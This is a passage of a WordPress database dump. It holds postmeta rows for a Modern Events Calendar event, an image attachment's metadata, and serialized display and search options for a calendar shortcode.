}'),(145454,265432,'mec_cost',''),(145455,265432,'mec_more_info_target','_self'),(145456,265432,'mec_more_info_title',''),(145457,265432,'mec_organizer_id','1'),(145458,265432,'mec_read_more',''),(145459,265432,'mec_more_info',''),(145460,265432,'mec_repeat_type',''),(145461,265432,'mec_repeat_status','0'),(145462,265432,'mec_end_day_seconds','72000'),(145463,265432,'mec_end_time_ampm','PM'),(145464,265432,'mec_end_time_minutes','0'),(145465,265432,'mec_end_time_hour','8'),(145466,265432,'mec_end_date','2021-09-01'),(145467,265432,'mec_start_day_seconds','68400'),(145468,265432,'mec_start_time_ampm','PM'),(145469,265432,'mec_start_time_minutes','0'),(145470,265432,'mec_public','1'),(145471,265432,'mec_start_date','2021-09-01'),(145472,265432,'mec_start_time_hour','7'),(145473,265432,'mec_countdown_method','global'),(145474,265432,'mec_timezone','global'),(145475,265432,'mec_comment',''),(145476,265432,'one_occurrence','0'),(145477,265432,'mec_hide_time','0'),(145478,265432,'mec_hide_end_time','0'),(145479,265432,'mec_event_status','EventScheduled'),(145480,265432,'mec_fields','a:0:{}'),(145481,265432,'mec_op','a:0:{}'),(145482,265432,'mec_bfixed_fields','a:0:{}'),(145483,265432,'mec_reg_fields','a:0:{}'),(145484,265432,'mec_reg_fields_global_inheritance','1'),(145485,265432,'mec_ticket_variations','a:0:{}'),(145486,265432,'mec_ticket_variations_global_inheritance','1'),(145487,265432,'mec_fees','a:0:{}'),(145488,265432,'mec_booking','a:0:{}'),(145489,265432,'mec_tickets','a:0:{}'),(145490,265432,'mec_fees_global_inheritance','1'),(145491,265432,'mec_hourly_schedules','a:0:{}'),(145492,265432,'mec_not_in_days',''),(145493,265432,'mec_in_days',''),(145494,265432,'mec_repeat_end_at_date',''),(145495,265432,'mec_advanced_days','a:0:{}'),(145496,265432,'passster_protection_type','password'),(145497,265432,'passster_activate_global_protection',NULL),(145498,265432,'passster_activate_protection',NULL),(145499,265432,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(145500,265432,'mec_repeat_end_at_occurrences',''),(145501,265432,'mec_repeat_end',''),(145502,265432,'mec_repeat_interval','1'),(145503,265432,'mec_allday','0'),(145504,265432,'mec_certain_weekdays','a:0:{}'),(145505,265432,'mec_dont_show_map','0'),(145506,265432,'mec_location_id','118'),(145507,265432,'mec_color',''),(145508,265432,'protect_children',''),(145509,265432,'_edit_lock','1630264784:2'),(145510,265432,'_edit_last','2'),(145520,265432,'_thumbnail_id','265434'),(145521,265434,'original-file','2021/08/animals-are-soul-2-updraft-pre-smush-original.jpg'),(145522,265434,'smush-complete','1'),(145523,265434,'smush-info','The file was compressed from 81.80 KB to 78.68 KB saving 3.82 percent using WP-Optimize'),(145524,265434,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:83765;s:12:\"smushed-size\";i:80567;s:15:\"savings-percent\";d:3.819999999999999840127884453977458178997039794921875;}'),(145527,265436,'_edit_lock','1686110829:2'),(145528,265436,'_edit_last','2'),(145529,265436,'label',''),(145530,265436,'category','110,113,114,116'),(145531,265436,'location','122,118'),(145532,265436,'organizer',''),(145533,265436,'tag',''),(145534,265436,'author',''),(145535,265436,'sf_status','1'),(145536,265436,'sf_display_label','0'),(145537,265436,'sf_reset_button','0'),(145538,265436,'sf_refine','0'),(145539,265436,'sf-options','a:12:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:16:\"general_calendar\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(145518,265434,'_wp_attached_file','2021/08/animals-are-soul-2.jpg'),(145519,265434,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:658;s:6:\"height\";i:439;s:4:\"file\";s:30:\"2021/08/animals-are-soul-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"animals-are-soul-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"animals-are-soul-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:30:\"animals-are-soul-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:30:\"animals-are-soul-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:30:\"animals-are-soul-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:30:\"animals-are-soul-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"animals-are-soul-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145540,265436,'skin','masonry'),(145541,265436,'sk-options','a:20:{s:4:\"list\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:6:\"F d, Y\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:4:\"grid\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:9:\"D, F d, Y\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"agenda\";a:18:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:13:\"full_calendar\";a:31:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"yearly_view\";a:16:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:12:\"monthly_view\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"weekly_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"timetable\";a:18:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:7:\"masonry\";a:22:{s:5:\"style\";s:6:\"fluent\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:1:\"4\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:5:\"cover\";a:12:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"265432\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"countdown\";a:12:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:14:\"available_spot\";a:9:{s:5:\"style\";s:7:\"classic\";s:19:\"fluent_date_format1\";s:3:\"F 